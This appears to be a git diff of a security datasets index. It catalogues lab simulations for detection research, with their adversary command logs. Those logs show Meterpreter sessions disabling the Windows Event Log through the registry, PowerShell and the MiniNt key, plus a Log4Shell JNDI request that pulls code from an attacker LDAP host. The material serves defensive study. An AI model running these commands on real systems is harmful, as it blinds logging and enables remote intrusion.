All rights reserved. \nC:\\Users\\IT01-Pedro\\Downloads>REG ADD HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog /t REG_DWORD /v Start /d 4\nREG ADD HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog /t REG_DWORD /v Start /d 4 \nValue Start exists, overwrite(Yes/No)? yes \nThe operation completed successfully. \nC:\\Users\\IT01-Pedro\\Downloads>\n\n**** Using reg meterpreter command:\n\nmsf6 exploit(multi/handler) > run \n[*] Started HTTPS reverse handler on https://192.168.56.40:8443 \n[*] https://192.168.56.40:8443 handling request from 192.168.56.43; (UUID: r64afjpx) Staging x64 payload (201308 bytes) ... \n[*] Meterpreter session 19 opened (192.168.56.40:8443 -> 127.0.0.1 ) at 2022-08-04 10:50:58 -0400 \n\nmeterpreter > reg setval -k 'HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog' -v 'Start' -t 'REG_DWORD' -d 4 \nSuccessfully set Start of REG_DWORD. \nmeterpreter >\n\n**** Using PowerShell module:\n\nmsf6 exploit(multi/handler) > run \n[*] Started HTTPS reverse handler on https://192.168.56.40:8443 \n[*] https://192.168.56.40:8443 handling request from 192.168.56.43; (UUID: bgwdtwdi) Staging x64 payload (201308 bytes) ... \n[*] Meterpreter session 21 opened (192.168.56.40:8443 -> 127.0.0.1 ) at 2022-08-04 11:36:38 -0400 \n\nmeterpreter > load powershell \nLoading extension powershell...Success. 
\nmeterpreter > powershell_execute \"Set-Service -Name EventLog -StartUpType Disabled\" \n[+] Command execution completed: \nmeterpreter >"}, "references": ["https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2", "https://www.offensive-security.com/metasploit-unleashed/interacting-registry/", "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/reg"]}, "SDWIN-220708104300": {"title": "Stopping Event Log Service after Stopping Depending Services", "id": "SDWIN-220708104300", "contributors": ["Jose Rodriguez @Cyb3rPandaH"], "creation_date": "2022/07/08", "modification_date": "2022/08/08", "platform": ["Windows"], "type": "atomic", "tags": ["powershell", "eventlog", "netprofm"], "description": "The simulation of this technique cosniders 2 steps: Disabling the netprofm service (Before reboot) and stopping the Event Log service (After reboot). Therefore, 2 datasets were generated, before-reboot and after-reboot data.\n\nWe have used PowerShell to execute this simulation: Execution using PowerShell (Spawned from cmd.exe) and execution using the PowerShell module from Metasploit.\n\nThis dataset was generated using a Windows 10 Pro Evaluation edition (Version:1903,OS Build:18362.30).", "attack_mappings": [{"technique": "T1562", "sub-technique": "002", "tactics": ["TA0005"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/cmd_psh_stop_netprofm_eventlog_before_reboot.zip"}, {"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/cmd_psh_stop_netprofm_eventlog_after_reboot.zip"}, {"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/psh_metasploit_stop_netprofm_eventlog_before_reboot.zip"}, {"type": "Host", 
"link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/psh_metasploit_stop_netprofm_eventlog_after_reboot.zip"}], "simulation": {"environment": "Lab VM", "tools": [{"type": "Manual", "name": "PowerShell", "module": "PowerShell", "script": null}, {"type": "Manual", "name": "Metasploit", "module": "PowerShell", "script": null}], "permissions_required": ["Administrator"], "adversary_view": "**** Using PowerShell (cmd.exe) - Before reboot:\n\nmsf6 exploit(multi/handler) > run \n[*] Started HTTPS reverse handler on https://192.168.56.40:8443 \n[*] https://192.168.56.40:8443 handling request from 192.168.56.43; (UUID: e2mshuiq) Staging x64 payload (201308 bytes) ... \n[*] Meterpreter session 1 opened (192.168.56.40:8443 -> 127.0.0.1 ) at 2022-08-08 15:30:15 -0400 \nmeterpreter > shell \nProcess 9804 created. \nChannel 1 created. \nMicrosoft Windows [Version 10.0.18362.30] \n(c) 2019 Microsoft Corporation. All rights reserved. \nC:\\Users\\IT01-Pedro\\Downloads>powershell \npowershell \nWindows PowerShell \nCopyright (C) Microsoft Corporation. All rights reserved. \nTry the new cross-platform PowerShell https://aka.ms/pscore6 \n\nPS C:\\Users\\IT01-Pedro\\Downloads> Set-Service -Name netprofm -StartupType Disabled \nSet-Service -Name netprofm -StartupType Disabled \nPS C:\\Users\\IT01-Pedro\\Downloads> \n\n**** Using PowerShell (cmd.exe) - After reboot: \n\nmsf6 exploit(multi/handler) > run \n[*] Started HTTPS reverse handler on https://192.168.56.40:8443 \n[*] https://192.168.56.40:8443 handling request from 192.168.56.43; (UUID: v8fufyz7) Staging x64 payload (201308 bytes) ... \n[*] Meterpreter session 4 opened (192.168.56.40:8443 -> 127.0.0.1 ) at 2022-08-08 15:48:54 -0400 \nmeterpreter > shell \nProcess 1536 created. \nChannel 1 created. \nMicrosoft Windows [Version 10.0.18362.30] \n(c) 2019 Microsoft Corporation. All rights reserved. 
\nC:\\Users\\IT01-Pedro\\Downloads>powershell \npowershell \nWindows PowerShell \nCopyright (C) Microsoft Corporation. All rights reserved. \nTry the new cross-platform PowerShell https://aka.ms/pscore6 \n\nPS C:\\Users\\IT01-Pedro\\Downloads> Stop-Service -Name EventLog -Force \nStop-Service -Name EventLog -Force \nPS C:\\Users\\IT01-Pedro\\Downloads> Get-Service -Name eventlog \nGet-Service -Name eventlog \n\nStatus Name DisplayName \n------ ---- ----------- \nStopped eventlog Windows Event Log\n\nPS C:\\Users\\IT01-Pedro\\Downloads> \n\n**** Using PowerShell (Metasploit) - Before reboot: \nmsf6 exploit(multi/handler) > run \n\n[*] Started HTTPS reverse handler on https://192.168.56.40:8443 \n[*] https://192.168.56.40:8443 handling request from 192.168.56.43; (UUID: l4nzbqn1) Staging x64 payload (201308 bytes) ... \n[*] Meterpreter session 5 opened (192.168.56.40:8443 -> 127.0.0.1 ) at 2022-08-08 16:39:26 -0400 \nmeterpreter > load powershell \nLoading extension powershell...Success. \nmeterpreter > powershell_execute \" Set-Service -Name netprofm -StartupType Disabled \" \n[+] Command execution completed: \nmeterpreter >\n\n**** Using PowerShell (Metasploit) - After reboot: \nmsf6 exploit(multi/handler) > run \n\n[*] Started HTTPS reverse handler on https://192.168.56.40:8443 \n[*] https://192.168.56.40:8443 handling request from 192.168.56.43; (UUID: khsnizoi) Staging x64 payload (201308 bytes) ... \n[*] Meterpreter session 6 opened (192.168.56.40:8443 -> 127.0.0.1 ) at 2022-08-08 16:55:45 -0400 \nmeterpreter > load powershell \nLoading extension powershell...Success. 
\nmeterpreter > powershell_execute \" Stop-Service -Name EventLog -Force \" \n[+] Command execution completed: \nmeterpreter > powershell_execute \"get-service -Name EventLog\" \n[+] Command execution completed: \n\nStatus Name DisplayName \n------ ---- ----------- \nStopped EventLog Windows Event Log \n\nmeterpreter > "}, "references": ["https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2", "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/stop-service?view=powershell-7.2"]}, "SDWIN-220803205800": {"title": "Stopping Event Logging via Creation of MiniNt Registry Key", "id": "SDWIN-220803205800", "contributors": ["Jose Rodriguez @Cyb3rPandaH"], "creation_date": "2022/08/03", "modification_date": "2022/08/03", "platform": ["Windows"], "type": "atomic", "tags": ["reg", "powershell", "eventlog", "minint"], "description": "After getting an elevated meterpreter session, we added the MiniNt registry key in the following hives HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control and HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control.\n\nAfter rebooting the system and trying to access event logs trough the Event Viewer application, we got the following message: Event Viewer cannot open the event log or custom view. Verify that Event Log service is running or query is too long. 
The request is not supported (50).\n\nWe have simulated this attack using 3 different procedures: REG command via cmd.exe, REG meterpreter command (Metasploit), and the PowerShell module (Metasploit).\n\nThese datasets describe the before-rebooitng phase of the simulation, and they were generated using a Windows 10 Pro Evaluation edition (Version:1903,OS Build:18362.30).", "attack_mappings": [{"technique": "T1562", "sub-technique": "002", "tactics": ["TA0005"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/reg_stop_event_logging_controlset_minint_key.zip"}, {"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/reg_stop_event_logging_controlset001_minint_key.zip"}, {"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/psh_stop_event_logging_controlset_minint_key.zip"}, {"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/psh_stop_event_logging_controlset001_minint_key.zip"}, {"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/cmd_stop_event_logging_controlset_minint_key.zip"}, {"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/cmd_stop_event_logging_controlset001_minint_key.zip"}], "simulation": {"environment": "Lab VM", "tools": [{"type": "Manual", "name": "cmd", "module": "cmd", "script": null}, {"type": "Manual", "name": "Metasploit", "module": "reg", "script": null}, {"type": "Manual", "name": "Metasploit", "module": "PowerShell", "script": null}], "permissions_required": ["Administrator"], "adversary_view": "**** Using reg command via 
cmd.exe:\n\nmsf6 exploit(multi/handler) > run \n\n[*] Started HTTPS reverse handler on https://192.168.56.40:8443 \n[*] https://192.168.56.40:8443 handling request from 192.168.56.43; (UUID: vtlafkal) Staging x64 payload (201308 bytes) ... \n[*] Meterpreter session 11 opened (192.168.56.40:8443 -> 127.0.0.1 ) at 2022-08-03 22:22:26 -0400 \n\nmeterpreter > shell \n\nProcess 8784 created. \nChannel 1 created. \nMicrosoft Windows [Version 10.0.18362.30] \n(c) 2019 Microsoft Corporation. All rights reserved. \n\nC:\\Users\\IT01-Pedro\\Downloads>REG ADD HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\MiniNt \n\nREG ADD HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\MiniNt \nThe operation completed successfully. \n\nC:\\Users\\IT01-Pedro\\Downloads> \n\n**** Using reg meterpreter command:\n\nmsf6 exploit(multi/handler) > run \n\n[*] Started HTTPS reverse handler on https://192.168.56.40:8443 \n[*] https://192.168.56.40:8443 handling request from 192.168.56.43; (UUID: y2cffmed) Staging x64 payload (201308 bytes) ... \n[*] Meterpreter session 5 opened (192.168.56.40:8443 -> 127.0.0.1 ) at 2022-08-03 19:01:55 -0400 \n\nmeterpreter > reg createkey -k 'HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\MiniNt' \n\nSuccessfully created key: HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\MiniNt \n\nmeterpreter > \n\n**** Using PowerShell module: \n\nmsf6 exploit(multi/handler) > run \n\n[*] Started HTTPS reverse handler on https://192.168.56.40:8443 \n[*] https://192.168.56.40:8443 handling request from 192.168.56.43; (UUID: 9203cnga) Staging x64 payload (201308 bytes) ... \n[*] Meterpreter session 9 opened (192.168.56.40:8443 -> 127.0.0.1 ) at 2022-08-03 19:43:05 -0400 \n\nmeterpreter > load powershell \n\nLoading extension powershell...Success. 
\n\nmeterpreter > powershell_execute \"New-Item -Path HKLM:\\SYSTEM\\CurrentControlSet\\Control\\MiniNt\" \n\n[+] Command execution completed: \n\n Hive: HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control \n\nName Property \n---- -------- \nMiniNt \n\nmeterpreter > "}, "references": ["https://www.quppa.net/blog/2016/04/14/beware-of-the-minint-registry-key/", "https://twitter.com/0gtweet/status/1182516740955226112", "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/new-item?view=powershell-7.2", "https://www.offensive-security.com/metasploit-unleashed/interacting-registry/", "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/reg"]}}, "compound": {"GoldenSAMLADFSMailAccess": {"title": "Golden SAML AD FS Mail Access", "id": "377d9af5-5009-48d9-ae97-1756a01d7ef8", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2021/08/02", "modification_date": "2021/08/02", "platform": ["Windows", "Azure"], "type": "compound", "tags": ["SimuLand"], "description": "This dataset represent a threat actor stealing the AD FS token signing certificate from an on-prem AD FS server to sign a new SAML token, impersonate a privileged user and eventually collect mail data via the Microsoft Graph API.", "attack_mappings": [{"technique": "T1552", "sub-technique": "004", "tactics": ["TA0006"]}, {"technique": "T1606", "sub-technique": "002", "tactics": ["TA0006"]}, {"technique": "T1606", "sub-technique": "002", "tactics": ["TA0006"]}, {"technique": "T1078", "sub-technique": "004", "tactics": ["TA0001", "TA0003", "TA0004", "TA0005"]}, {"technique": "T1098", "sub-technique": "002", "tactics": ["TA0003"]}, {"technique": "T1114", "sub-technique": null, "tactics": ["TA0009"]}], "files": [{"type": "Cloud", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/compound/GoldenSAMLADFSMailAccess/AADAuditEvents.Zip"}, {"type": "Cloud", "link": 
"https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/compound/GoldenSAMLADFSMailAccess/Microsoft365DefenderEvents.Zip"}, {"type": "Cloud", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/compound/GoldenSAMLADFSMailAccess/OfficeActivityEvents.Zip"}, {"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/compound/GoldenSAMLADFSMailAccess/WindowsEvents.Zip"}], "simulation": {"environment": "SimuLand", "environment_link": "https://github.com/Azure/SimuLand/tree/main/2_deploy/aadHybridIdentityADFS"}, "references": ["https://github.com/Azure/SimuLand", "https://github.com/Azure/SimuLand/tree/main/labs/01_GoldenSAMLADFSMailAccess"]}, "Log4Shell": {"title": "Log4Shell", "id": "34861b31-60d9-4c2a-a25d-df929256004b", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2021/12/11", "modification_date": "2022/05/13", "platform": ["Windows", "Linux"], "type": "compound", "tags": null, "description": "Datasets created while simulating a threat actor exploiting [CVE 2021-44228](https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44228) via a JNDI Reference Java Object.\nIn Log4j <= 2.14, `Message Lookups` were enabled by default creating an input validation vulnerability.\nA threat actor could take advantage of this vulnerability to make a Java application process JNDI lookups to download and execute Java objects from an attacker controlled naming service.\nThere are a few types of Java objects that can be stored in a directory service.\nA JNDI reference object is one of them. A JNDI reference jave object points to the location of the Java object requested. 
\n", "attack_mappings": [{"technique": "T1190", "sub-technique": null, "tactics": ["TA0001"]}, {"technique": "T1203", "sub-technique": null, "tactics": ["TA0002"]}], "notebooks": null, "files": [{"type": "Network", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/compound/Log4Shell/pcap_log4shell_cve2021_44228_jndi_reference.zip"}, {"type": "Network", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/compound/Log4Shell/pcap_log4shell_cve2021_44228_java_serialized.zip"}, {"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/compound/Log4Shell/securityauditing_log4shell_cve2021_44228_java_serialized_object.zip"}, {"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/compound/log4shell/sysmon_log4shell_cve2021_44228_java_serialized_object.zip"}, {"type": "Network", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/compound/log4shell/vminsights_vmconnection_log4shell_cve2021_44228_jndi_reference.zip"}, {"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/compound/log4shell/syslog_auoms_auditd_log4shell_cve2021_44228_jndi_reference.zip"}, {"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/compound/log4shell/syslog_sysmon_log4shell_cve2021_44228_jndi_reference.zip"}], "simulation": {"environment": "Microsoft Sentinel To-Go", "tools": [{"type": "Manual", "name": "sh", "module": "sh", "script": "https://github.com/Cyb3rWard0g/log4jshell-lab/blob/main/research-notes/2021-12-11_01-CVE-2021-44228-simulation.md"}], "permissions_required": ["User"], "adversary_view": "curl -X GET -H 'user-agent: ${jndi:ldap://192.168.2.6:1389/o=reference}' 192.168.2.5:8080/Log4j-2.14.0-SNAPSHOT/api"}, "references": ["https://isc.sans.edu/diary/RCE+in+log4j%2C+Log4Shell%2C+or+how+things+can+get+bad+quickly/28120", 
"https://github.com/OTRF/Microsoft-Sentinel2Go/tree/master/grocery-list/Linux/demos/CVE-2021-44228-Log4Shell", "https://github.com/Cyb3rWard0g/log4jshell-lab"]}}} \ No newline at end of file 
diff --git a/datasets/.index/sec-dsets-index.json.gz b/datasets/.index/sec-dsets-index.json.gz new file mode 100644 index 0000000000000000000000000000000000000000..39b1d7de532a6b4f7b3842ad89bf64928a0eac8a GIT binary patch literal 68506 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 